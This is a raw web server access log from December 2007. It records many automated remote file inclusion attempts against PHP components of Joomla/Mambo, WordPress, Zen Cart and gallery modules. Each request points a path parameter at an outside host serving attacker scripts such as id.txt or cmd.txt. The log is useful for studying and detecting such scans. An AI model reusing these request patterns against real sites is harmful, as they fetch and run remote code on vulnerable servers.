208.53.147.60 - - [23/Dec/2007:18:24:38 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.djspower.de/cms//components/com_forum/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
208.53.147.60 - - [23/Dec/2007:18:24:38 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.djspower.de/cms//components/com_forum/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
64.13.248.15 - - [23/Dec/2007:18:24:38 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=http://filicudi.t35.com/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.248.15 - - [23/Dec/2007:18:24:41 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=http://filicudi.t35.com/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.248.15 - - [23/Dec/2007:18:24:44 -0800] "GET /logs/access_070917.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=http://filicudi.t35.com/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.248.15 - - [23/Dec/2007:18:24:45 -0800] "GET /logs/access_070806.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=http://filicudi.t35.com/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.50.12.32 - - [23/Dec/2007:18:24:52 -0800] "GET /logs/access_070917.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.117.166.233 - - [23/Dec/2007:18:27:47 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
216.117.166.233 - - [23/Dec/2007:18:27:47 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
77.48.10.14 - - [23/Dec/2007:18:28:32 -0800] "GET /logs/access_070723.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.universidadcorporativa.com/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.48.10.14 - - [23/Dec/2007:18:28:32 -0800] "GET /logs/access.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.universidadcorporativa.com/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.194.71.230 - - [23/Dec/2007:18:28:44 -0800] "GET /index.php?page=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
82.194.71.230 - - [23/Dec/2007:18:28:47 -0800] "GET /logs/index.php?page=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
83.170.102.103 - - [23/Dec/2007:18:28:48 -0800] "GET /logs/access_071001.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:28:48 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
83.170.102.103 - - [23/Dec/2007:18:28:48 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.213.31.4 - - [23/Dec/2007:18:28:58 -0800] "GET /index2.php?page=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
62.213.31.4 - - [23/Dec/2007:18:28:58 -0800] "GET /logs/index2.php?page=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
88.131.106.16 - - [23/Dec/2007:18:29:33 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [23/Dec/2007:18:29:33 -0800] "GET /labia/?N=D HTTP/1.0" 200 508 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:29:46 -0800] "GET /logs/access_071210.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.194.71.230 - - [23/Dec/2007:18:31:02 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
82.194.71.230 - - [23/Dec/2007:18:31:02 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
202.53.227.2 - - [23/Dec/2007:18:31:06 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://mis.mju.ac.kr/~jandi/bbs/icon/ash.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
202.53.227.2 - - [23/Dec/2007:18:31:10 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://mis.mju.ac.kr/~jandi/bbs/icon/ash.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:31:38 -0800] "GET /logs/access_070917.log/start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:31:38 -0800] "GET /start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:31:38 -0800] "GET /logs/start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:31:42 -0800] "GET /logs/access_070917.log/start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:31:42 -0800] "GET /start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:31:43 -0800] "GET /logs/start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
72.36.227.10 - - [23/Dec/2007:18:32:25 -0800] "GET /logs/access_071014.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:18:32:25 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:18:32:26 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:32:36 -0800] "GET /logs/access_070917.log/start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:32:42 -0800] "GET /start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:32:47 -0800] "GET /logs/start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
116.68.194.36 - - [23/Dec/2007:18:33:01 -0800] "GET /index.php?page=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
116.68.194.36 - - [23/Dec/2007:18:33:01 -0800] "GET /logs/index.php?page=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:18:33:21 -0800] "GET /logs/access_070917.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:35:43 -0800] "GET /logs/access_070625.log/start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:35:49 -0800] "GET /logs/access_070625.log/start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.50.12.32 - - [23/Dec/2007:18:36:13 -0800] "GET /logs/access_071014.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.12.32 - - [23/Dec/2007:18:36:13 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.12.32 - - [23/Dec/2007:18:36:14 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.162 - - [23/Dec/2007:18:36:23 -0800] "GET /logs/access_070716.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.50.12.32 - - [23/Dec/2007:18:36:26 -0800] "GET /logs/access_070910.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:36:30 -0800] "GET /logs/access_071217.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:36:30 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:36:31 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:36:31 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:37:04 -0800] "GET /logs/access_070625.log/start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.22.162 - - [23/Dec/2007:18:38:11 -0800] "GET /logs/access_070806.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.30.216.93 - - [23/Dec/2007:18:45:40 -0800] "GET /logs/access_071014.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:46:10 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:46:10 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:46:10 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:18:46:16 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:46:31 -0800] "GET /logs/access_071217.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:46:32 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:46:32 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
83.170.102.103 - - [23/Dec/2007:18:46:32 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:18:46:33 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
66.197.28.59 - - [23/Dec/2007:18:46:33 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:18:46:33 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:18:46:33 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:18:46:34 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:18:46:34 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:47:05 -0800] "GET /logs/access_070723.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:47:05 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:47:06 -0800] "GET /logs/access.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:47:12 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:47:12 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.58.190.84 - - [23/Dec/2007:18:47:12 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:47:12 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:47:12 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:47:12 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.152.158.46 - - [23/Dec/2007:18:47:45 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
61.152.158.46 - - [23/Dec/2007:18:47:45 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:48:30 -0800] "GET /logs/access_071217.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:48:31 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:48:31 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
83.170.102.103 - - [23/Dec/2007:18:48:31 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:50:04 -0800] "GET /logs/access_070723.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:50:04 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:50:04 -0800] "GET /logs/access.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:50:11 -0800] "GET /logs/access_071014.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:50:12 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
83.170.102.103 - - [23/Dec/2007:18:50:12 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:50:12 -0800] "GET /logs/access_070917.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:18:50:21 -0800] "GET /logs/access_070723.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:18:50:21 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:18:50:22 -0800] "GET /logs/access.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:50:53 -0800] "GET /logs/access_070723.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.58.190.84 - - [23/Dec/2007:18:50:53 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:50:53 -0800] "GET /logs/access.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:18:51:28 -0800] "GET /logs/access_071014.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:18:51:28 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:18:51:28 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:18:51:29 -0800] "GET /logs/access_070910.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
162.105.250.2 - - [23/Dec/2007:18:51:43 -0800] "GET /logs/index.php?page=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:51:44 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:51:44 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.162.134.131 - - [23/Dec/2007:18:51:47 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.162.134.131 - - [23/Dec/2007:18:51:47 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.162.134.131 - - [23/Dec/2007:18:51:47 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
